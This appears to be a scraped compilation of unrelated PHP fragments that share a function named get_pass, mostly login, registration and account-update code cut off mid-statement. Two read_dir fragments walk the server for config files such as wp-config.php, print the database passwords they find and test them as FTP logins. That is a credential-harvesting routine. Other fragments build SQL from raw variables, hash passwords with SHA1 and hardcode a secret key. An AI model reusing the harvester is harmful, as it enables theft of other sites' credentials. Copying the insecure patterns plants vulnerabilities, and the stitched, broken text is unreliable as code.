function auth_user() { global $auth_user, $auth_pass; $user = get_user(); $pass = get_pass(); //No User/Pass defined: Allow everything if (empty($auth_user) && empty($auth_pass)) { return true; } if ($user == $auth_user && $pass == $auth_pass) { return true; } return false; }
function read_dir($path, $username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "{$path}{$file}"; if ($file != '.' and $file != '..') { if (is_readable($fpath)) { $dr = "{$fpath}/"; if (is_dir($dr)) { read_dir($dr, $username); } else { if ($file == 'config.php' or $file == 'config.inc.php' or $file == 'db.inc.php' or $file == 'connect.php' or $file == 'wp-config.php' or $file == 'var.php' or $file == 'configure.php' or $file == 'db.php' or $file == 'db_connect.php') { $pass = get_pass($fpath); if ($pass != '') { echo "[+] {$fpath}\n{$pass}\n"; ftp_check($username, $pass); } } } } } } } }
$request = 'resetCode'; } else { $error['toolate'] = 'The reset code was not found. Usually the request is deleted after 3 hours.'; } } else { $error['mysql'] = 'Error quering database.'; } } // STEP 3. They filled the form for new password if (!empty($_POST['newPassword'])) { //passwords match? if (!empty($_POST['pass1']) && !empty($_POST['pass2']) && $_POST['pass1'] == $_POST['pass2']) { if (strlen($_POST['pass1']) < 8) { $error['shortpass'] = '******'; } else { $newPass = get_pass($_POST['pass1']); // We have password } } else { $error['pass'] = '******'; $request = 'resetCode'; } //code is ok? if (!empty($_POST['code'])) { $code = mysql_real_escape_string($_POST['code'], $dbConn); } else { $error['code'] = 'The resetCode was not passed along with the passwords.'; } if (empty($error)) { //the code exists in pass_reset table?
function strtohex($string) { $hex = ''; for ($i = 0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } // Variable arrangement ($username and $password) and $error settings if (!empty($_POST['username']) && $_POST['username'] != 'username') { $username_form = mysql_real_escape_string($_POST['username']); } else { $error['username'] = "******"; } if (!empty($_POST['password']) && $_POST['password'] != '********') { $password = get_pass($_POST['password']); } else { $error['password'] = "******"; } // No errors? All arrranged? Bring back the userdata at $arrUser if that guy exists if (empty($error)) { /* START OLD PASSWORD PATCH */ require_once $_SERVER['DOCUMENT_ROOT'] . '/admin/isOldUser.php'; // The faulty strtohex function in use... So that it produces the results of 1.0 $oldPassword = strtohex(hash_hmac('sha256', $_POST['password'], 'c#haRl891', true)); if ($arrUser = isOldUser($username_form, $oldPassword, $dbConn)) { // Update the table with the new password $idUser = $arrUser['idUser']; // turn 0 the oldPass & update the new pass $query = "UPDATE users SET pass = '******', oldPass='******' WHERE idUser = '******'"; $result = mysql_query($query, $dbConn);
update_photo($name, $type, $bytes, $user, $id); update_admin($fName, $mName, $lName, $id); update_account($pass, $id); $message = "<div class = 'alert alert-success' style = 'width: 350px;'>Account is successfully updated.</div>"; echo "<script>"; //go back to viewMed page after 3 seconds. echo "setTimeout(function(){ document.location = '?p=profileAdmin'; }, 2000);"; echo "</script>"; } else { $message = "<div class = 'alert alert-warning' style = 'width: 350px;'>Invalid File.</div>"; } } } else { //if not submitted we retrieve the data from the database $adminFind = find_admin($id); $user_pass = get_pass($id); if ($adminFind) { $fName = $adminFind['LABSUPFNAME']; $mName = $adminFind['LABSUPMNAME']; $lName = $adminFind['LABSUPLNAME']; $pass = $user_pass['PASSWORD']; } else { $message = '<div class="alert alert-warning">The specified admin record cannot be found.</div>'; } } ?> <html> <body> <div class="container"> <h4>Update Account</h4> <hr/>
$message = "<div class = 'alert alert-warning' style = 'width: 350px;'>Invalid File.</div>"; } } } else { //if not submitted we retrieve the data from the database $workingFind = find_working($id); if ($workingFind) { $fName = $workingFind['WORKINGFNAME']; $mName = $workingFind['WORKINGMNAME']; $lName = $workingFind['WORKINGLNAME']; $course = $workingFind['WORKINGCOURSE']; $yr = $workingFind['WORKINGYR']; $lab = $workingFind['ASSIGNEDLAB']; $time = $workingFind['TIME']; $days = $workingFind['DAYS']; $get_pass = get_pass($id); $pass = $get_pass['PASSWORD']; } else { $message = '<div class="alert alert-warning">The specified working student record cannot be found.</div>'; } } ?> <html> <body> <div class="container"> <h4>Update Working Student</h4> <hr/> <form method="post" enctype="multipart/form-data"> <div class="col-md-4"> <?php echo $message;
if (empty($error)) { // First, check if user wants to change the password if (!empty($_POST['currentPass'])) { $currentPass = get_pass($_POST['currentPass']); // Is the sent current password the same we have stored? if ($arrUser['pass'] != $currentPass) { $error['currentPass'] = '******'; } else { // Ok, you want to change the password. Let's see if we have new passwords... if (!empty($_POST['newPass']) && !empty($_POST['newRePass'])) { // ... and are the same if ($_POST['newPass'] != $_POST['newRePass']) { $error['rePassword'] = '******'; } else { // creating the new password $newPass = get_pass($_POST['newPass']); } } else { $error['changePass'] = '******'; } } } // Still no errors? really? ok, go on if (empty($error)) { // Preparing the query without password changes... if (empty($newPass)) { $query = "UPDATE users SET username = '******', first_name = '{$first_name}', last_name = '{$last_name}', \n email = '{$email}', country = '{$country}', homepage = '{$homepage}', location = '{$location}', about = '{$about}',\n notify = '{$notify}', picasaUser = '******' WHERE idUser = {$idUser}"; // UPDATE TABLE AND SESSION $result = mysql_query($query, $dbConn); $_SESSION['NC_user'] = $username; } else {
function read_dir($path, $username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "{$path}{$file}"; if ($file != '.' and $file != '..') { if (is_readable($fpath)) { $dr = "{$fpath}/"; if (is_dir($dr)) { read_dir($dr, $username); } else { if ($file == 'config.php' or $file == 'configuration.php' or $file == 'wp-config.php' or $file == 'config.inc.php' or $file == 'database.php' or $file == 'conf.php' or $file == 'settings.php' or $file == 'setting.php' or $file == 'inc.php' or $file == 'corn.php' or $file == 'configs.php' or $file == 'konfig.php' or $file == 'dbconf.php' or $file == 'koneksi.php' or $file == 'dbconfig.php' or $file == 'db.inc.php' or $file == 'db_connect.php' or $file == 'dbconnect.php' or $file == 'db-connect.php' or $file == 'configure.php' or $file == 'global.php' or $file == 'connect.php' or $file == 'db.php' or $file == 'conf_db.php' or $file == 'database.inc.php' or $file == 'database.php' or $file == 'connection.php' or $file == 'connections.php' or $file == 'configure.class.php' or $file == 'config.class.php' or $file == 'configuration.class.php' or $file == 'db.class.php' or $file == 'file_manager.php' or $file == 'LocalSettings.php' or $file == 'filemanager.php' or $file == 'manager.php' or $file == 'managers.php' or $file == 'connect.inc.php' or $file == 'dbconnect.inc.php') { $pass = get_pass($fpath); if ($pass != '') { echo "[+] {$fpath}\n{$pass}\n"; ftp_check($username, $pass); } } } } } } } }
<br> <button type='submit'>Send</button> </form> <?php if (isset($_REQUEST['array'])){ $arResult = explode(' ', $_REQUEST['array']); $str = implode(",", $arResult); foreach ($arResult as &$value) { $value += 2; } echo $str; echo "<pre>"; print_r($arResult); echo "</pre>"; }*/ $string = "Привет, меня зовет Евгений"; $name = "меня"; $len = strlen($name); $post = strripos($string, $name); //echo substr($string, $post, $len); //$res = str_replace('Евгений', $name, $string); //echo $string,"<br>"; //echo $res,"<br>"; function get_pass($len) { $patern = "bhgfbgfbgfbnzgf45643gfdg"; $temp = str_shuffle($patern); return substr($temp, 0, $len); } echo get_pass(10);
if (!empty($userEmail) || !empty($preuserEmail)) { $error['email'] = 'The e-mail is already in use.'; $reg_email = ''; } } else { $error['reg_email'] = 'A valid email address is needed.'; } // Password if (!empty($_POST['reg_pass']) && !empty($_POST['reg_repass'])) { // same passwords if (strlen($_POST['reg_pass']) < 8) { $error['shortpass'] = '******'; } elseif ($_POST['reg_pass'] != $_POST['reg_repass']) { $error['pass'] = '******'; } else { $reg_pass = get_pass($_POST['reg_pass']); // We have password; } } else { $error['password'] = '******'; } // country if (!empty($_POST['reg_country'])) { foreach ($country_list as $country) { if ($_POST['reg_country'] == $country) { $reg_country = mysql_real_escape_string($_POST['reg_country']); // We have country. } } } else { $reg_country = '';
$actualUser = $_POST['mail']; $userExist = false; $connected = false; $actualPass = SHA1($_POST['password']); //VERIF SI USER TAPE EXISTE foreach ($users as $user) { if (strcmp(strval($actualUser), strval($user['user_mail'])) == 0) { $mail = $user['user_mail']; $id = $user['user_id']; $userExist = true; } } //SI USER EXIST //VERIF SI MDP CORRESPOND if ($userExist == true) { $passwords = get_pass($actualUser); foreach ($passwords as $password) { if ($actualPass == $password['user_password']) { $connected = true; } else { $connected = false; } } if ($connected == true) { session_start(); $_SESSION['id'] = $id; $_SESSION['mail'] = $mail; echo 'Vous maintenant connecté !'; echo 'cliquez <a href="../../controler/c_jobs.php">ici</a> pour revenir à l\'accueil'; } else { echo 'Mauvais mot de passe !';